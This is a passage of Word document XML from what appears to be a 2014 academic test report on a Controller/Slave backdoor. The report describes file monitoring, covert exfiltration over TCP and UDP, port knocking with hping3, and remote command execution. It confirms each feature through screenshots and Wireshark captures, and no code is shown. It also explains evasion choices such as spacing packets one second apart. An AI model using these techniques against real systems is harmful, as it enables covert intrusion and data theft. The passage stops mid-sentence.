    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Controller’s firewall is properly configured with timers for TCP and UDP access, and is ready for backdoor simulation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="h.2af1a0fg6jbq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="51" w:name="_Toc405739275"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:t xml:space="preserve">Controller can read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>In the following screenshot, upon initializing the Controller, the output of the program to console regarding its configuration file is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3919538" cy="1662082"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="image79.png" descr="Screenshot from 2014-12-04 18:41:15.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image79.png" descr="Screenshot from 2014-12-04 18:41:15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3919538" cy="1662082"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">To confirm that it is reading the configuration file successfully, a screenshot of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>controller.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration file is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2324100" cy="1615406"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="image39.png" descr="Screenshot from 2014-12-04 18:42:28.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png" descr="Screenshot from 2014-12-04 18:42:28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2324100" cy="1615406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>There are no outstanding differences between program and configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="h.kruf0kel0i4s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="53" w:name="_Toc405739276"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:t>Slave will be monitoring a file if Controller sets mode to “file”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>NOTE: Prior to running this test, a directory called “test” is created on the root directory of the Slave machine. Then, a file called “test.txt” is created within the newly created test directory. We will use this file as our file to monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>While the backdoor is running on the Slave machine, the following command is executed from the Controller. This command tells the backdoor application on the Slave machine to monitor the specified file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3609975" cy="1309688"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3609975" cy="1309688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>On the Slave machine, we receive the following messages from the backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3743325" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3743325" cy="752475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="h.ra9c1k6eldo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc405739277"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When there are changes in file to monitor, send results to Controller via TCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We modify the file’s contents. Once we save the file, we receive the following messages from the backdoor; note the port knocks from the backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36"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27"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>These screenshots confirm that our program is capable of monitoring files. To check the network, Wireshark was running during testing. After filtering the capture, the following screenshot confirms our communication:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42"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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of these packets, there are no evidence to suggest that “Hello World!” exists as plaintext within the payload. Therefore, we were able to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the data using covert channels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="h.woeoo6ihtd4x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="57" w:name="_Toc405739278"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:t>When there are changes in file to monitor, send results to Controller via UDP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>We modify the file’s contents. Once we save the file, we receive the following messages from the backdoor; note the port knocks from the backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55"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29"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3695700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>These screenshots confirm that our program is capable of monitoring files. To check the network, Wireshark was running during testing. After filtering the capture, the following screenshot confirms our communication:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49"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30"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1435100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">Of these packets, there are no evidence to suggest that “Hello World!” exists as plaintext within the payload. Therefore, we were able to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the data using covert channels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Controller will be exporting changes if file to monitor is specified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>On the Controller’s side, we receive the changed values from the file we were monitoring outputted to console when the protocol was using TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4638675" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38"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31"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4638675" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">Likewise, the output for UDP component of the exfiltration yields similar results as seen in the following screenshot. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4638675" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33"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32"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4638675" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>This confirms that the Controller is able to listen in modes TCP and UDP protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="h.yuhjrg4c6ece" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="59" w:name="_Toc405739279"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:t>Slave can execute commands from Controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>While the backdoor is running on the Slave, the Controller executes the following command and sends it to the backdoor application over TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4505325" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="image98.png" descr="Screenshot from 2014-12-04 19:36:03.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image98.png" descr="Screenshot from 2014-12-04 19:36:03.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4505325" cy="1457325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">The backdoor parses this command, and attempts to execute it. Upon completion of execution, as seen in the below screenshot, the backdoor sends the output back to the Controller. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2686050" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="image105.png" descr="Screenshot from 2014-12-04 19:40:09.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image105.png" descr="Screenshot from 2014-12-04 19:40:09.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2686050" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>This screenshot from Wireshark running on the Slave machine shows the traffic being sent to the Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1282700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="image73.png" descr="Screenshot from 2014-12-04 19:37:44.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image73.png" descr="Screenshot from 2014-12-04 19:37:44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1282700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>This confirms that our backdoor is able to communicate back to the Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="h.mxnrohhibra2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="61" w:name="_Toc405739280"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r>
        <w:t>Controller can receive command results from Slave after execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Once we were able to send our command to the backdoor, the Controller waits until it receives a response from the backdoor. When it does, the application outputs response values like so:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4505325" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="image86.png" descr="Screenshot from 2014-12-04 19:36:20.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image86.png" descr="Screenshot from 2014-12-04 19:36:20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4505325" cy="1647825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">While </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not possible to see the time between each line of output, the following screenshot from Wireshark can help highlight the spread of these payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="image78.png" descr="Screenshot from 2014-12-04 19:36:06.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image78.png" descr="Screenshot from 2014-12-04 19:36:06.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">Basically, over a set of 11 packets, each packet was delayed by 1 second. For a small line of text, this is quite long. However, to maintain covertness, it is imperative to have the traffic spread out. This confirms that the Controller can receive responses from the backdoor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="h.esg2e88qx08i" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="63" w:name="_Toc405739281"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r>
        <w:t>When connection is requested, Controller recognizes port knocking sequence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once the firewall configuration is applied, a port knocking script is tested against the system. The script is executed by the backdoor to use hping3 to craft packets specific to our port knocking signature. Here are the firewall results after sending a packet to each port STATE:</w:t>
